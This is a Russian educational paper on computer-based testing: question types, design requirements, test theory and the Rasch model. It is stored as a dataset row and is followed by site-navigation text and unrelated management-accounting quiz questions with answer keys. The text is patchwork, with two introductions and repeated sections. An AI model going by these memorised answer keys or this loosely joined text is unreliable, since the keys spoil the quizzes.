url
stringlengths 34
127
| title
stringlengths 3
254
| download_url
stringlengths 71
74
| filepath
stringlengths 42
43
| content
stringlengths 0
2.75M
⌀ |
---|---|---|---|---|
https://doc4web.ru/informatika/testovaya-sistema-kompyuternogo-kontrolya.html | Тестовая система компьютерного контроля | https://doc4web.ru/uploads/files/169/c8fca01dea27788902ca5b7e325fa3a6.docx | files/c8fca01dea27788902ca5b7e325fa3a6.docx | Введение
Современный период развития общества характеризуется сильным влиянием на него компьютерных технологий, которые проникают во все сферы человеческой деятельности, обеспечивают распространение информационных потоков в обществе, образуя глобальное информационное пространство. Неотъемлемой и важной частью этих процессов является компьютеризация образования. В настоящее время в России идет становление новой системы образования, ориентированного на вхождение в мировое информационно-образовательное пространство. Этот процесс сопровождается существенными изменениями в педагогической теории и практике учебно-воспитательного процесса, связанными с внесением корректив в содержание технологий обучения, которые должны быть адекватны современным техническим возможностям, и способствовать гармоничному вхождению ребенка в информационное общество. Компьютерные технологии призваны стать не дополнительным «довеском» в обучении, а неотъемлемой частью целостного образовательного процесса, значительно повышающей его эффективность.
За последние 5 лет число детей, умеющих пользоваться компьютером, увеличилось примерно в 10 раз. Как отмечает большинство исследователей, эти тенденции будут ускоряться независимо от школьного образования. Однако, как выявлено во многих исследованиях, дети знакомы в основном с игровыми компьютерными программами, используют компьютерную технику для развлечении. При этом познавательные, в частности образовательные, мотивы работы с компьютером стоят примерно на двадцатом месте. Таким образом, для решения познавательных и учебных задач компьютер используется недостаточно.
Одна из причин такого положения связана с тем, что компьютерные технологии в школе не нашли еще своего должного применения. В школах же, где ведется обучение детей на компьютере, не все его возможности реализуются в полной мере. Большинство учителей начальных классов даже не знакомы с компьютерными технологиями и не имеют представления о способах их использования в обучении. Уроки с применением компьютера в большинстве случаев ведут учителя информатики, в силу специфики своей подготовки слабо представляющие условия, которые необходимо соблюдать при использовании компьютерных технологий при обучении конкретным предметам.
Проблема широкого применения компьютерных технологий в сфере образования в последнее десятилетие вызывает повышенный интерес в отечественной педагогической науке. Большой вклад в решение проблемы компьютерной технологии обучения внесли российские и зарубежные ученые: Г.Р.Громов, В.И.Гриценко, В.Ф.Шолохович, О.И.Агапова, О.А.Кривошеев, С.Пейперт, Г.Клейман, Б.Сендов, Б.Хантер и др.
Различные дидактические проблемы компьютеризации обучения в нашей стране нашли отражение в работах А.П.Ершова, А.А.Кузнецова, Т.А.Сергеевой, И.В.Роберт; методические - Б.С.Гершунского, Е.И.Машбица, Н.Ф.Талызиной; психологические - В.В.Рубцова, В.В. Тихомирова и др.
Тестовая система компьютерного контроля
Одной из самых распространенных на данный момент компьютеризированных систем организации контроля знаний является тестовая система. Главные требование к такой системе заключаются в том, что:
тестовые вопросы и варианты ответов на них должны быть четкими и понятными по содержанию;
компьютерный тест должен быть простым в использовании, на экране желательно иметь минимум управляющих кнопок, инструкции-подсказки по действиям обучающегося должны появляться только в нужное время в нужном месте, а не присутствовать на экране постоянно, загромождая его;
в тестовую систему должна быть включена оценка степени правильности ответа на каждый заданный обучающемуся вопрос;
тестовых вопросов должно быть настолько много, чтобы совокупность этих вопросов охватывала весь материал, который обучающийся должен усвоить;
вопросы должны подаваться испытуемому в случайном порядке, чтобы исключить возможность механического запоминания их последовательности;
вопросы не должны начинаться с номера или какого-либо символического обозначения для того, чтобы исключить запоминание вопроса по порядку его следования или символу, его обозначающему;
варианты возможных ответов должны следовать так же в случайном порядке;
необходимо проводить учет времени, затраченного на ответы, и ограничивать это время.
Учет времени, как считает большинство учителей, -- один из способов борьбы со шпаргалкой: если вопросов много, то для поиска ответа на очередной вопрос нужна либо очень большая шпаргалка, либо целиком учебник. Но такой поиск ответа займет много времени и, следовательно, общий итог по времени может оказаться отрицательным. Чтобы иметь положительный результат проверки, нужно давать ответы не только правильно, но и достаточно быстро.
Задания тестового контроля, в зависимости от изучаемого предмета, уровня сложности и целей контроля, условно можно разделить на тестовые вопросы и тестовые задания. Тестовый вопрос требует от обучающегося только знания того или иного факта, изложенного в учебнике, ответ на тестовый вопрос может быть дан сразу путем выбора его из предложенных вариантов ответа. В тестовом задании ответ может быть дан только после выполнения испытуемым некоторых дополнительных действий, связанных, например, с какими-то вычислениями, выполнением логических операций, выбором формул, подбором числовых или графических данных и др.
Задания, представленные а виде тестовых вопросов, являются наиболее распространенными, легкими в программировании и достаточно хорошо изученными. Разработка тестовых заданий менее разработана и более сложна в реализации.
В настоящее время наиболее широко распространены тестовые вопросы следующих типов [24]:
Тип А. Наиболее простой. В нем в качестве вопроса фигурирует фраза в вопросительной или утвердительной форме, и предлагаются только два возможных варианта ответов: «Да» и «Нет». Один их этих ответов является истинным, другой -- ложным. Например, вопрос: Волга впадает в Каспийское море. Возможные варианты ответа: Да, Нет.
Правильный ответ: Да.
Тип Б. На поставленный вопрос нужно дать ответ, выбрав один или несколько пунктов из предложенных вариантов. При этом предполагается, что среди предложенных вариантов ответа присутствуют все правильные, а также несколько ложных. Например, вопрос: Волга впадает в ……… море. Возможные варианты ответа: Азовское, Черное, Каспийское, Средиземноморское.
Правильный ответ: Каспийское.
Тип В. Требуется заполнить пропуски в предложении текстовыми фрагментами, предложенными в качестве вариантов ответа. При этом среди предлагаемых фрагментов обязательно присутствуют все правильные, а также несколько ложных. Например, вопрос: Восстановите известную фразу из произведения А. С. Пушкина «Мой ... самых честных ...». Возможные варианты ответа: отец, брат, дядя, кузен, намерений, правил, пожеланий.
Правильный ответ: дядя, правил.
Тип Г. Требуется установить и указать соответствие между элементами двух списков. Предполагается, что списки имеют одинаковую длину (одинаковое количество элементов) и существует однозначное соответствие между элементами списков. Например, вопрос: Укажите соответствие между фамилиями писателей и названиями литературных произведений, которые они написали. Писатели: А. С. Пушкин, Л. Н. Толстой, А. П. Чехов. Литературные произведения: «Три сестры», «Капитанская дочка», «Война и мир».
Правильный ответ: А. С. Пушкин, «Капитанская дочка»; Л. Н. Толстой, «Война и мир»; А. П. Чехов, «Три сестры». Или то же самое сочетание, но записанное в другом порядке.
Тип Д. Требуется переставить элементы списка в соответствии с заданным условием. Например, вопрос: Расставьте следующие события в хронологическом порядке. Список: первый полет человека в космос, первая высадка человека на Луну, запуск первого искусственного спутника Земли.
Порядок следования типов тестовых вопросов соответствует уровням трудности их анализа компьютерной системой. В то же время, вопросы всех перечисленных типов можно свести к вопросам одного типа (А), меняя количество вопросов в большую сторону.
Таким образом, рассмотренные примеры компьютеризации школьного образования показывают, что компьютерные технологии, как и любые другие, имеют свои сильные и слабые стороны. Педагогический процесс это не только обучение, но и формирование личности, а компьютер, к сожалению, этого не обеспечивает. Однако он способствует релаксации учащихся в процессе познавательной деятельности, что само по себе активизирует мышление, а следовательно, и усвоение изучаемого материала.
Проблема реконструкции традиционных задач
для применения в новых образовательных технологиях
Среди преподавателей есть немало тех, кто привержен к задачному подходу в обучении. Они считают задачи главным средством развития интеллекта и средством приближения математического образования к требованиям жизни. Вероятно поэтому уже тысячелетиями сложилась традиция включения в школьное образование достаточно большого числа текстовых задач. О важности и полезности задач для развития учащихся и студентов сказано много правильных слов, и с этим не поспоришь.
Однако применение задач имеет не только положительные стороны, но и отрицательные, а также спорные.
Уже отмечалось, что задачи, вопросы и упражнения в тестовом процессе не используются. Ответы на них иногда бывают столь многословными и нестандартизованными, что для выявления истинности требуются большие затраты живого труда учителей и интеллектуальной энергии. Не похожи на тестовую форму и традиционные вопросы, ответы на которые могут быть правильными в различных отношениях, полисемантичными, нетехнологичными, а потому их не рекомендуется включать в тест.
Некоторые задачи отнимают неоправданно много учебного времени на их решение. А время - важнейший фактор образовательных технологий. Вообще, экономия общественного времени – важный политический, образовательный, экономический и социально-психологический фактор. Всё перечисленное можно назвать первым недостатком.
Второй недостаток задач - мы не знаем объективно и точно- насколько трудна задача для того или иного учащегося? Задачи школьных и вузовских учебников до сего дня фактически не оценены экспертами по качеству и по трудности. Одна из причин - полное отсутствие в образовательной сфере нужной для страны независимой педагогической экспертизы: задач, заданий, учебников, образовательных программ и многого другого. Множество министерских советов, управляемые чиновниками, выполняют сейчас иные функции.
Третий дефект многих задач – их недостаточная понимаемость учащимися, что проистекает из-за слабого внимания к лексике и содержанию самих задач. Между тем понимаемость задачи всеми учащимися – одно из главных требований к задаче, всё ещё не достижимое. Полезно напомнить, что в тестовой технологии понимаемость задания теста для каждого испытуемого является важным, тест образующим, свойством.
Главная причина непонимания смысла задач – отставание части учащихся в интеллектуальном отношении, плохое владение понятиями, упор на письменные формы контроля математических знаний, исключение из практики устных экзаменов, коллоквиумов и заметно поникшая языковая культура у большинства учащихся в последние пятнадцать лет «реформирования» образования. Математическая неграмотность примерно трети учащихся страны усугубляется сомнительным профилированием школьного образования. Профилизация призвана подменить сбалансированное общее среднее образование, являющееся наивысшей общеобразовательной ценностью во всё мире. Не случайно, например, в последние годы в английском и японском образовании число профильных школ заметно сокращено.
Четвёртый недостаток – нетехнологичность применения традиционных задач в учебном процессе. Тексты задач, ход их осмысления и решения, особенно у слабых учащихся, трудно адаптировать к требованиям образовательных технологий. Отсюда немалые затруднения в организации массового адаптивного обучения решению задач, особенно в дистанционном образовании, а также в оказании помощи учащимся, не решающим трудные для них задачи.
ВЫВОДЫ
1. Применение заданий в тестовой форме, в сочетании с новыми образовательными технологиями позволяет обеспечить кардинальное улучшение учебного процесса за счёт активизации обучающей, контролируюшей, организующей, диагностирующей, воспитательной и мотивирующей функции таких заданий. Многократно было показано, что задания в тестовой форме, сочетаемые с модульным принципом организации учебного процесса, обеспечивают высокий уровень усвоения учебного материала, последовательность и прочность его изучения.
2. Известный в педагогической литературе задачный подход к организации учебного процесса может быть существенно модифицирован посредством реконструкции самих задач, а также применением заданий в тестовой форме, что помогает повысить уровень технологизации учебного процесса, делать задачи понятнее, создавать параллельные и облегчённые варианты одной и той же задачи.
Современное состояние педагогического контроля в российской системе образования представляет собой контрастное сочетание старого с новым, субъективного с объективным, устного опроса по пятибалльной системе оценок с попытками внедрения контролирующих технологий. Тестовый метод на сегодняшний день быстро развивающееся направление на стыке педагогики, теории измерений, математического моделирования, математической статистики и автоматизации. Внедрение и развитие такого тестирования внесет существенный вклад в процесс реформирования отечественной системы образования и ее интеграции в мировую образовательную практику [11]. Учитывая важность тестирования для процесса обучения в школе, рассмотрим историю его развития и современное состояние методов тестирования в нашей стране.
История проверки знаний и способностей с помощью различных заданий насчитывает около 4 тысяч лет. Данные археологии свидетельствуют о том, что учителя древнейшей шумерской школы для проверки усвоения и закрепления материала практиковали “контрольные работы” по узнаванию текста пройденных произведений [12, c.73]. Однако первые научные труды по теории тестов появились в начале XX века, на стыке психологии, социологии, педагогики и других так называемых поведенческих наук (Behavioral Sciences). Одними из основоположников теории тестов были ученые Ф.Гальтон [14], Дж.Кеттел [13]. Вопросам теории тестов посвящены труды В.С.Аванесова, А.Анастази, Х.Зиверта, и др. [2, 3, 8].
Зарубежные психологи называют теорию тестов психометрикой (Psychometrika), а педагоги - педагогическим измерением (Educational measurement). На русском языке принято называть эту науку тестологией. Тестология - наука о тестах. Тест - это краткое стандартизированное испытание, предназначенное как для получения объективной количественной оценки результатов обучения, так и для распознавания интересующих нас особенностей и качеств личности [6].
Тесты для объективного контроля знаний и умений называют педагогическими. Педагогический тест принято определять как систему заданий определенного содержания, специфической формы, позволяющую качественно и эффективно измерить уровень и оценить структуру подготовленности учащихся, контролировать результат усвоения ими в процессе обучения знаний и умений. Педагогические тесты по целям применения делятся на: 1) тесты достижений, профориентированные тесты; 2) критериально-ориентированные тесты; 3) нормативно-ориентированные тесты; 4) аттестационные тесты; 5) тесты прогнозирования результатов обучения.
Существуют две основные формы тестовых заданий: 1) задания закрытой формы - задания с выбором из вариантов ответа, представленных испытуемому, задание на установление соответствия и задания на конструирование правильной последовательности; 2) задания открытой формы - задания, когда ответ конструируется, набирается или формулируется самим испытуемым, т.е. в постановке задания нет возможных вариантов ответа.
Разработка заданий в тестовой форме проводится на основе ряда обоснованных требований в рамках единой методики. В рамках методики, принятой в мировой практике, к таким требованиям относят следующие: 1) в тексте задания должна быть устранена всякая двусмысленность или неясность формулировок; 2) основная часть задания формулируется предельно кратко (как правило, не более одного предложения); 3) все варианты ответа к одному заданию должны быть приблизительно одинаковой длины; 4) из текста задания необходимо исключить все вербальные ассоциации, способствующие выбору правильного ответа с помощью догадки.
Содержание заданий и всего теста в целом должно удовлетворять определенным критериям, задающим систему нормативных требований к качеству содержания теста: 1) критерий полноты отображения материала учебной программы; 2) критерий соответствия содержания теста знаниям и умениям, на проверку которых тест направлен; 3) критерий соответствия теста требованиям Образовательного стандарта по дисциплине; 4) критерий качества содержания тестовых заданий.
Помимо критериев в классической тестологии выделяют следующие принципы отбора содержания тестового материала: 1) значимость; 2) научная достоверность; 3) соответствие содержания теста уровню современного состояния науки; 4) репрезентативность; 5) возрастающая трудность учебного материала; 5) вариативность содержания; 6) системность содержания; 7) комплексность и сбалансированность содержания теста; 8) взаимосвязь содержания и формы; 9) соответствие цели.
Методы измерения качества тестов опираются на теорию корреляций, главными параметрами которой являются надежность и валидность. Надежность - устойчивость результатов теста, получаемых при его применении. Валидность - пригодность теста, т.е. способность качественно измерять то, для чего он создан по замыслу авторов. Определение надежности и валидности тестов проводится путем статистической обработки результатов массового тестирования по различным группам испытуемых.
Под длиной теста понимается количество заданий, входящих в тест. Классическая теория тестов утверждает: чем длиннее тест, тем он надежнее. Но практика аудиторного тестирования показывает, что если тест очень длинный, то ухудшается мотивация и внимание. Оптимальная длина теста – 30-60 заданий. Каждый тест имеет оптимальное время тестирования - время от начала процедуры тестирования до момента наступления утомления. Разброс по характеристикам порога наступления утомления довольно большой - от 20 до 100 минут в одной возрастной группе. Основные причины утомления: возраст, мотивация, монотонность выполняемой работы, индивидуальные особенности испытуемых.
Минимальная продолжительность тестирования зависит от форм, количества и трудности заданий. Например, для выполнения простого тестового задания закрытой формы с выбором одного элемента из предложенных достаточно 10-15 секунд [1].
Появившиеся на рубеже XX века педагогические тесты быстро завоевали популярность во всех развитых странах. Однако в СССР к 30-м годам развернулась их встречная критика, а затем их полный запрет. И только в начале 90-х годов методы педагогического тестирования для контроля знаний и умений стали внедряться в российские школы и вузы. Тестирование в России в настоящее время развивается на двух уровнях: 1) на государственном уровне реализуются проекты по тестированию под эгидой Министерства образования РФ: ЕГЭ, Телетестинг, Централизованное компьютерное тестирование; 2) на корпоративном уровне наука стремительно развивается в рамках средних, профессиональных и высших образовательных учреждений и учебных центров.
На корпоративном уровне научными исследованиями и практикой тестирования в России занимается множество различных учреждений. Среди учебных заведений, которые активно занимаются и развивают направления тестирования, следует отметить Современная Гуманитарная Академия, МГУ, МГПУ, МЭСИ, ПТИ, Институт социальных проблем и некоторые другие вузы. Например, в центре тестирования Пензенского технологического института разработка тестов ведется на принципах организации систем искусственного интеллекта. При создании тестовых заданий, контролирующих усвоение учебного материала и связанных с ним понятий, акцент делается на анализ семантических связей актуальных понятий дисциплины с определяющими их базовыми понятиями. В Современной Гуманитарной Академии разработаны психометрические подходы к определению уровней (фаз) и темпов усвоения знаний и умений у обучающихся, основанные на теории линков - единиц знаний и нейрофизиологических процессах [9]. Также в Современной Гуманитарной Академии для определения усвоения новых понятий и умений студентов применяются компьютерные мастер-тесты и супертьюторы – обучающие компьютерные программы с обратной связью [5].
С развитием информационных технологий и коммуникаций методы тестирования вышли на новый уровень: тестирование с использованием персональных компьютеров и on-line тестирование с использованием Internet. Применение информационных технологий для оценивания качества обучения дает целый ряд преимуществ перед проведением обычного контроля. Прежде всего – это возможность организации централизованного контроля, обеспечивающего охват всего желаемого контингента учащихся. Далее, компьютеризация позволяет сделать контроль более объективным, не зависящим от субъективности преподавателя.
Развитие информационных технологий способствовало разработке и внедрению в практическое использование различных программных комплексов тестирования.
Анализ современной научно-методической литературы [7], а также информации из сети Internet [15, 16, 17] позволяет сформулировать основные признаки, которыми должен обладать современный программный комплекс тестирования:
Основное требование для современной контролирующей системы заключается в абстрагировании от содержания, уровня сложности, тематики, типа и предметной направленности отдельных тестовых заданий. Подобная стандартизация позволяет не прибегать для создания каждого очередного теста и обработки его результатов к услугам программистов, а, освоив определенную систему, наполнять ее содержательную часть по различным дисциплинам на основе общих принципов. Высокая степень абстрагированности от конкретного учебного материала, отобранного для составления теста, определяет свойство универсальности;
Контролирующая система должна состоять из подсистем следующего назначения: создание тестов (формирование банка вопросов и заданий, стратегий ведения опроса и оценивания), проведение тестирования (предъявление вопросов, обработка ответов), мониторинг качества знаний обучаемых на протяжении всего времени изучения темы или учебной дисциплины на основе протоколирования хода и итогов тестирования в динамически обновляемой базе данных. Наличие независимых, но взаимосвязанных, компонентов (подсистем): создания теста, мониторинга результатов, проведения тестирования определяет свойство модульности;
Данные в контролирующей системе должны храниться централизованно на удаленном сервере. Доступ к данным осуществляется через локальную сеть. Наличие единого банка данных вопросов для каждой запущенной копии программы определяет свойство централизованности;
Контролирующая система должна разграничивать права пользователей по типичным ролям (учащийся, преподаватель) для предотвращения доступа тестируемых к правильным ответам теста и т.п. – свойство защищенности;
Контролирующая система может обладать возможностью настройки на проведение диагностирования с применением различных моделей диагностики для получения результатов, определённых ведущей идеей диагностирования, например, применение адаптивной модели тестирования – свойство адаптивности;
В контролирующей системе должна проводиться математическая обработка результатов тестирования, в частности, расчет трудности заданий теста – свойство обработки результатов теста.
Перечислены основные требования, предъявляемые к современному программному комплексу тестирования. Также современную систему диагностирования должны определять следующие признаки: режимы тестирования, типы вопросов, используемых в тесте, случайная выборка заданий, ограничение времени тестирования, импортирование тестовых заданий из документа MicroSoft Word.
Таким образом, в настоящее время определение трудности заданий теста является одним из требований, предъявляемых к современному программному комплексу тестирования. Обработка результатов теста с определением трудности заданий теста необходима для научного подхода к составлению тестов.
С этой точки зрения интересной моделью обработки тестов, ориентированных на критерий, является однопараметрическая модель Раша [4, 10], которая позволяет:
формировать тест из заданий различной степени трудности;
делать достаточно объективный вывод о способности тестируемого на основании количества решенных задач;
делать вывод о вероятности решения того или иного задания определенного уровня трудности.
Введение:
в настоящее время одним из путей совершенствования профессионального образования считается повышение качества образовательных услуг. Это объясняется объективным повышением требований, предъявляемых к профессиональным навыкам специалистов, их образованности. В современных педагогических исследованиях большое внимание уделяется средствам и методам повышения качества образования в целом и качества высшего профессионального образования в частности. С точки зрения повышения качества образования пересматриваются все основные компоненты педагогического процесса, анализируется их потенциал, создаются новые технологии обучения, основным принципом проектирования которых является соответствие критериям качества. Категория качества становится символом цивилизационного развития и будущей выживаемости цивилизации [54]. В качестве меры качества образования используется его эффективность. Эффективность в сфере высшего образования оценивается по результатам успешности учения студентов, а также по их воспитанности и развитости. Поэтому средством получения информации об эффективности высшего образования является педагогический контроль. Отдельные исследователи проблем педагогики отмечают прямую зависимость эффективности образования от организации и качества педагогического контроля [137, 58, 87,131]. Педагогический контроль является неотъемлемой компонентой образовательного процесса, имеет значимость в любой технологии обучения, преследует различные цели и выполняет различные функции, определяющие формы контроля. В профессиональном образовании Великобритании, Германии, США, Франции, Японии в течение последних 30 лет в качестве формы педагогического контроля широко используется тестирование, а в последнее десятилетие компьютерное тестирование. В этих странах накоплен большой опыт использования тестирования в профессиональном образовании, там же существует немало критиков повального тестирования, которые отмечают такие недостатки этой формы педагогического контроля, как невозможность проверить культуру мышления обучающегося, его исследовательские качества, умение рассуждать, общаться с коллегами и оппонентами, отстаивать свою точку зрения [119, 59]. Развитие компьютерной техники расширило возможности тестирования, а следовательно, и круг его применения. Компьютерный тест может использовать 4 адаптивные технологии, включать в себя элементы деловой игры, сложную по сценарию систему подсказок и справочную систему, отслеживать пошаговое выполнение обучающимся каких-либо действий, фактически реализовывая функции индивидуального репетитора [77]. Эти возможности практически обеспечивают каждому студенту индивидуальную программу обучения, которая подстраивается под его личностные особенности восприятия информации, тем самым, реализуя организующую, обучающую, мотивирующую функции педагогического контроля. Тестирование, как форма контроля достижений обучающихся всё шире используется и в практике высшего профессионального образования. Отношение к тестированию, как педагогов, так и обучающихся различно. В работах B.C. Аванесова, Ж.А. Байрамовой, Н.Ф. Ефремовой, К.Г. Кречетникова, А.Н. Майорова, Ю.М. Неймана, А.В. Смирнова, В.А. Хлебникова, М.Б. Челышковой, А.Г. Шмелёва широко обсуждаются вопросы организации тестирования, методические аспекты, влияющие на результаты тестирования, принципы составления тестовых заданий, различные методики разработки тестов. В них отмечается, что тестирование одна из наиболее технологичных и объективных форм педагогического контроля. Методологические и педагогические основы создания и использования программных комплексов, предназначенных для организации компьютерного тестирования, описаны в работах таких исследователей как А. Борк [30], Р. Вильяме [29], К. Маклин, Е.И. Машбиц [96], Пейперт [113, 114]. Особый акцент делается на то, что компьютерные программные оболочки для тестового контроля должны обеспечивать возможность использования различных форм тестовых заданий, адаптации к возможностям пользователя, генерации заданной последовательности заданий из общего банка, а интерфейс компьютерных программных оболочек должен быть интуитивно понятным и обеспечивать комфорт обучающемуся. Обсуждая проблемы применения тестов в профессиональном образовании, большинство авторов не подвергают сомнению эффективность применения тестирования для организации текущего и рубежного контроля (Е.А. Михайличев, Д.А. Таевский, Л.В. Шкерина). Такое применение тестов позволяет преподавателю с минимальными затратами времени и усилий получать информацию о качестве усвоения студентами изучаемой дисциплины, одновременно систематизируя и корректируя их знания, развивая познавательный интерес к дисциплине. Достаточно хорошо изучено влияние регулярного применения текущего тестового контроля на качество обучения (В.Н. Ефимов, Н.В. Изотова, М.Р. Кудаев). 5 Тем не менее, вопрос о применении тестирования для итогового или вступительного контроля, имеет как сторонников, так и противников. При этом сторонники тестирования указывают на тот факт, что, достаточно давно и успешно компьютерное тестирование применяется в контроле знаний по математике, физике, иностранному языку. Противники тестирования чаще всего указывают на недопустимость его применения при проверке знаний по истории, литературе, философии. Однако, и сторонники, и противники тестирования как формы педагогического контроля, рассматривая достоинства и недостатки тестов, не анализируют возможности интеграции традиционного контроля и тестирования. В современной педагогической литературе не освещаются вопросы об эффективности использования тестирования в сравнении с традиционными методами педагогического контроля, области оптимального применения тестирования в рамках различных дисциплин и этапов контроля достижений. Таким образом, целесообразно говорить о сложившихся противоречиях в теории и практике педагогической науки: между необходимостью повышения эффективности обучения в вузе за счёт использования компьютерных тестов и слабой изученностью взаимосвязи и взаимозависимости результатов различных форм педагогического контроля; между внедрением в практику массового тестирования в ВУЗах и невозможностью с помощью тестов проверить культуру мышления, развитие исследовательских качеств, умение рассуждать, обосновывать свою точку зрения; между наличием достоинств, присущих компьютерному тестированию: возможность адаптации к особенностям обучающегося, обеспечение выбора индивидуального банка заданий для каждого обучающегося, возможность организации обучающего контроля и др. и опасностью нивелирования данных достоинств неправильной организацией разработки и применения компьютерных тестов. Необходимость разрешения указанных противоречий и определила проблему данного исследования: «Возможно ли повышение эффективности обучения в ВУЗе за счёт интеграции компьютерного тестирования и традиционного контроля?» Цель исследования: выявить и обосновать возможность интеграции традиционного контроля и компьютерного тестирования для повышения эффективности обучения в ВУЗе на примере естественнонаучных и технологических дисциплин. Объект исследования: процесс контроля в обучении естественнонаучным и технологическим дисциплинам в высшем учебном заведении.
Список литературы
1. Аванесов B.C. Научные проблемы тестового контроля знаний //Учебное пособие. М., 1994.-135 с.
2. Аванесов B.C. Основы научной организации педагогического контроля в высшей школе: Учебное пособие для слушателей Учебного центра. //М., 1989.« 107 с. 3. Аванесов B.C. Композиция тестовых заданий: Книга для преподавателей вузов, техникумов, для студентов и аспирантов пед.вузов //В.С.Аванесов. 2-е изд., испр. и доп.-М.:Адепт,1998.-217 с.
4. Аванесов B.C. Контроль за знаниями студентов: метод валидных тестов М., 1983.-112 с.
5. Аванесов В.С.Современные методы обучения и контроля знаний Владивосток ДВГТРУ1999. 1 2 5 с.
6. Аванесов B.C. Формы тестовых заданий: Учеб. пособие. М.: МИСиС, 1991.35с.
7. Аванесов B.C. Из глубины веков //Педагогическая диагностика.-2003.- №1 .С.3-7. 8. БЛ.Б. Айсмонтас Педагогическая психология М. ВладосПресс 2002 208 с.
8. Алиджанов Э.К. Современные подходы к оценке учебных достижений учащихся, доклад 1997г//интернет- http://xpt.narod.ru/files/html/xpt/materials/ sovremennye podhody к осепке uchebnyh .htm
Сейчас онлайн: 165
Онлайн всего: 165
Гостей: 109
Пользователей: 56
→ Просмотр личных данных
→ Редактирование личных данных
→ Личные сообщения (0)
→ Мои рефераты (получить доступ)
→ Выход
→ С днем студента!!! (24.01.2011)
→ С наступающим Новым годом... (21.12.2010)
→ Лимит на скачивание работ (20.11.2010)
→ Наша группа "В Конта... (12.11.2010)
→ Новый дизайн реферат банк... (15.09.2010)
→ Курсовые работы
→ Калужский филиал ВЗФЭИ
→ Иностранный язык.
→ Теория вероятностей
→ Экономическая теория
Главная » Рефераты » Рефераты 5-курс » Бухгалтерский управленческий учет » Тесты по Бухгалтерскому управленческому учету
Тесты по Бухгалтерскому управленческому учету
Тесты
по дисциплине
Бухгалтерский управленческий учет
Тема 1 «Основы бухгалтерского управленческого учета»
1. Управленческий учет представляет собой подсистему:
а) статистического учета;
б) финансового учета;
в) бухгалтерского учета.
Ответ: в
2. Основой бухгалтерского управленческого учета является:
а) финансовый бухгалтерский учет;
б) налоговый учет;
в) производственный учет;
г) статистический учет.
Ответ: в
3. Основная цель управленческого учета состоит в предоставлении информации:
а) внешним пользователям;
б) внутренним пользователям;
в) органам исполнительной власти.
Ответ: б
4. Требование обязательности ведения учета в наибольшей степени распространяется на:
а) финансовый учет;
б) управленческий учет;
в) оперативный производственный учет.
Ответ: а
5. В функциональные обязанности бухгалтера-аналитика предприятия входят:
а) анализ финансовой отчетности;
б) управленческое консультирование по вопросам планирования, контроля и регулирования деятельности центров ответственности;
в) налоговое консультирование.
Ответ: б
6. Принципами управленческого учета являются:
а) единый подход к выбору целей и задач управленческого и финансового учета производства;
б) единые планово-учетные единицы для двух видов учета;
в) однократное введение первичной информации для всех видов учета;
г) преемственность и дополнение информации одного вида учета другим.
Ответ: г
7. Основным объектом бухгалтерского управленческого учета является:
а) организация как самостоятельное юридическое лицо;
б) группа предприятий, объединенных по отраслевой принадлежности;
в) центр ответственности;
г) ответ зависит о цели управленческого учета.
Ответ: в
8. Бухгалтерский управленческий учет можно определить как
а) синтетический учет затрат;
б) синтетический учет затрат и результатов;
в) аналитический учет затрат;
г) аналитический учет затрат и результатов.
Ответ: г
9. Наибольшей хозяйственной самостоятельностью обладает:
а) центр затрат;
б) центр доходов;
в) центр прибыли;
г) центр инвестиций.
Ответ: г
...........................
Тесты
по дисциплине
«Бухгалтерский управленческий учет»
Тема 1: «Основы бухгалтерского управленческого учета»
1. Основная цель управленческого учета состоит в предоставлении информации:
а) внешним пользователям;
б) внутренним пользователям;
в) органам исполнительной власти.
Ответ: б
2. Требование обязательности ведения учета в наибольшей степени распространяется на:
а) финансовый учет;
б) управленческий учет;
в) оперативный производственный учет.
Ответ: а
3. В функциональные обязанности бухгалтера-аналитика предприятия входят:
а) анализ финансовой отчетности;
б) управленческое консультирование по вопросам планирования, контроля и регулирования деятельности центров ответственности;
в) налоговое консультирование.
Ответ: б
4. Принципами управленческого учета являются:
а) единый подход к выбору целей и задач управленческого и финансового учета производства;
б) единые планово-учетные единицы для двух видов учета;
в) однократное введение первичной информации для всех видов учета;
г) преемственность и дополнение информации одного вида учета другим.
Ответ: г
5. Бухгалтерский управленческий учет можно определить как
а) синтетический учет затрат;
б) синтетический учет затрат и результатов;
в) аналитический учет затрат;
г) аналитический учет затрат и результатов.
Ответ: г
6. Наибольшей хозяйственной самостоятельностью обладает:
а) центр затрат;
б) центр доходов;
в) центр прибыли;
г) центр инвестиций.
Ответ: г
7. Общим для финансового и управленческого учета является:
а) их информация является основой для принятия управленческих решений;
б) операции могут отражаться лишь в рублевой оценке;
в) целью ведения является составление бухгалтерского баланса;
Ответ: а
8. Руководитель центра прибыли несет ответственность за:
а) затраты своего подразделения;
б) доходы своего подразделения;
в) затраты и доходы своего подразделения;
Ответ: в
9. Наличие центров прибыли и инвестиций возможно при существовании:
а) централизованной структуры управления организацией;
б) децентрализованной структуры управления организацией;
Ответ: б
10. Производственный учет это часть:
а) налогового учета
б) управленческого учета
в) финансового учета
г) финансового учета и управленческого учета
Ответ: г
..........................................
Тема 7. «Сегментарная отчетность организации»
10. Не все активы компании идентифицированы с конкретными бизнес-единицами. Это означает, что:
а) уровень целевой нормы прибыли, устанавливаемый подразделениям, не должен превышать стоимость капитала компании;
б) уровень целевой нормы прибыли, устанавливаемый подразделениям, должен быть выше стоимости капитала компании;
в) ответ зависит от отраслевой принадлежности бизнес-единиц.
Ответ: б
Вопрос 1. Маржинальный доход представляет собой:
1. сумму превышения фактической прибыли над суммой платежей в бюджет от фактической прибыли
2. сумму превышения нормативного значения затрат над их фактическим значением
3. сумму превышения выручки от реализации над суммой переменных затрат в себестоимости реализованной продукции
Вопрос 2. Создание центров ответственности позволяет на крупных предприятиях:
1. децентрализовывать ответственность за прибыль
2. осуществлять контроль за дисциплиной труда
3. осуществлять контроль за техникой безопасности и загрязнением окружающей среды
(Шеремет А.Д. р. 17, 17.3)
Вопрос 3. Управленческий учет отличается от финансового учета тем, что служит:
1. Для внутренних пользователей, обеспечивает управленческий аппарат информацией для
планирования, собственно управления и контроля за деятельностью организации.
2. Для внешних пользователей.
3. Обеспечивает управленческий аппарат информацией для планирования, собственно управления и контроля
за деятельностью организации.
В финансовом учете отражается наличие и движение всех запасов продукции, а в управленческом учете
отражается планомерный процесс формирования затрат на производстве всей продукции и себестоимости
отдельных изделий, контроль за снижением себестоимости продукции, выявление резервов ее снижения.
Вопрос 4. Организация управленческого учета на предприятии:
1. зависит от решения администрации
2. строго обязательна
3. обязательна не для всех типов предприятий
Вопрос 5. Источниками информации управленческого учета в отличие от финансового учета могут быть:
1. Данные производственного учета, данные оперативного бухучета, любые документы бухучета либо
